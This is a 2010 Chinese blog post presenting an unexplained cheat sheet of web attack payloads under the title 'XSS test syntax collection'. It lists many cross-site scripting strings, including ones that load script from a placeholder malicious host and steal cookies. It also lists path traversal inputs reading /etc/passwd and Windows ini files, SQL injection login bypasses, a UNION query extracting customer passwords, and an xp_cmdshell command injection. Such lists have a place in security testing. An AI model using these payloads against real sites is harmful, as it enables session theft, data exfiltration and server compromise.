XSS测试语法大全

上一篇 / 下一篇  2010-11-09 21:54:46

查看( 867 ) / 评论( 0 ) / 评分( 0 / 0 )

XSS测试语法大全

  <script>alert(document.cookie)</script>  ='><script>alert(document.cookie)</script>  <script>alert(document.cookie)</script>  <script>alert(vulnerable)</script>  %3Cscript%3Ealert(' ...
  <script>alert(document.cookie)</script>
  ='><script>alert(document.cookie)</script>
  <script>alert(document.cookie)</script>
  <script>alert(vulnerable)</script>
  %3Cscript%3Ealert('XSS')%3C/script%3E
  <script>alert('XSS')</script>
  <img src="javascript.:alert('XSS')">
  %0a%0a<script>alert(\"Vulnerable\")</script>.jsp
  %22%3cscript%3ealert(%22xss%22)%3c/script%3e
  %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
  %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
  %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
  <script>alert('Vulnerable');</script>
  <script>alert('Vulnerable')</script>
  ?sql_debug=1
  a%5c.aspx
  a.jsp/<script>alert('Vulnerable')</script>
  a?<script>alert('Vulnerable')</script>
  "><script>alert('Vulnerable')</script>
  ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
  %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
  %3Cscript%3Ealert(document. domain);%3C/script%3E&
  %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
  ../../../../../../../../etc/passwd
  ..\..\..\..\..\..\..\..\windows\system.ini
  \..\..\..\..\..\..\..\..\windows\system.ini
  '';!--"<XSS>=&{()}
  <IMG SRC="javascript.:alert('XSS');">
  <IMG SRC=javascript.:alert('XSS')>
  <IMG SRC=JaVaScRiPt.:alert('XSS')>
  <IMG SRC=JaVaScRiPt.:alert("XSS")>
  <IMG SRC=javascript.:alert('XSS')>
  <IMG SRC=javascript.:alert('XSS')>
  <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  <IMG SRC="javascript.:alert('XSS');">
  "<IMG SRC=java\0script.:alert(\"XSS\")>";' > out
  <IMG SRC=" javascript.:alert('XSS');">
  <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
  <BODY BACKGROUND="javascript.:alert('XSS')">
  <BODY NLOAD=alert('XSS')>
  <IMG DYNSRC="javascript.:alert('XSS')">
  <IMG LOWSRC="javascript.:alert('XSS')">
  <BGSOUND SRC="javascript.:alert('XSS');">
  <br size="&{alert('XSS')}">
  <LAYER SRC="http://惡意網址/a.js"></layer>
  <LINK REL="stylesheet" HREF="javascript.:alert('XSS');">
  <IMG SRC='vbscript.:msgbox("XSS")'>
  <IMG SRC="mocha:[code]">
  <IMG SRC="livescript.:[code]">
  <META. HTTP-EQUIV="refresh" CONTENT="0;url=javascript.:alert('XSS');">
  <IFRAME. SRC=javascript.:alert('XSS')></IFRAME>
  <FRAMESET><FRAME. SRC=javascript.:alert('XSS')></FRAME></FRAMESET>
  <TABLE BACKGROUND="javascript.:alert('XSS')">
  <DIV STYLE="background-image: url(javascript.:alert('XSS'))">
  <DIV STYLE="behaviour: url('http://惡意網址/exploit.html');">
  <DIV STYLE="width: expression(alert('XSS'));">
  <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  <IMG STYLE='xss:expre\ssion(alert("XSS"))'>
  <STYLE. TYPE="text/javascript">alert('XSS');</STYLE>
  <STYLE. TYPE="text/css">.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  <STYLE. type="text/css">BODY{background:url("javascript.:alert('XSS')")}</STYLE>
  <BASE HREF="javascript.:alert('XSS');//">
  getURL("javascript.:alert('XSS')")
  a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
  <XML SRC="javascript.:alert('XSS');">
  "> <BODY NLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
  <SCRIPT. SRC="http://惡意網址/xss.jpg"></SCRIPT>
  <IMG SRC="javascript.:alert('XSS')"
  <!--#exec cmd="/bin/echo '<SCRIPT. SRC'"--><!--#exec cmd="/bin/echo '=http://惡意網址/a.js></SCRIPT>'"-->
  <IMG SRC="http://惡意網址/somecommand.php?somevariables=maliciouscode">
  <SCRIPT. a=">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT. =">" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT. a=">" '' SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT. "a='>'" SRC="http://惡意網址/a.js"></SCRIPT>
  <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://惡意網址/a.js"></SCRIPT>
  <A HREF=http://惡意網址/>link</A>
  admin'--
  ' or 0=0 --
  " or 0=0 --
  or 0=0 --
  ' or 0=0 #
  " or 0=0 #
  or 0=0 #
  ' or 'x'='x
  " or "x"="x
  ') or ('x'='x
  ' or 1=1--
  " or 1=1--
  or 1=1--
  ' or a=a--
  " or "a"="a
  ') or ('a'='a
  ") or ("a"="a
  hi" or "a"="a
  hi" or 1=1 --
  hi' or 1=1 --
  hi' or 'a'='a
  hi') or ('a'='a
  hi") or ("a"="aXSS測試語法><script>alert(document.cookie)</script>


收藏 举报

TAG:

 

评分:0

我来说两句

Open Toolbar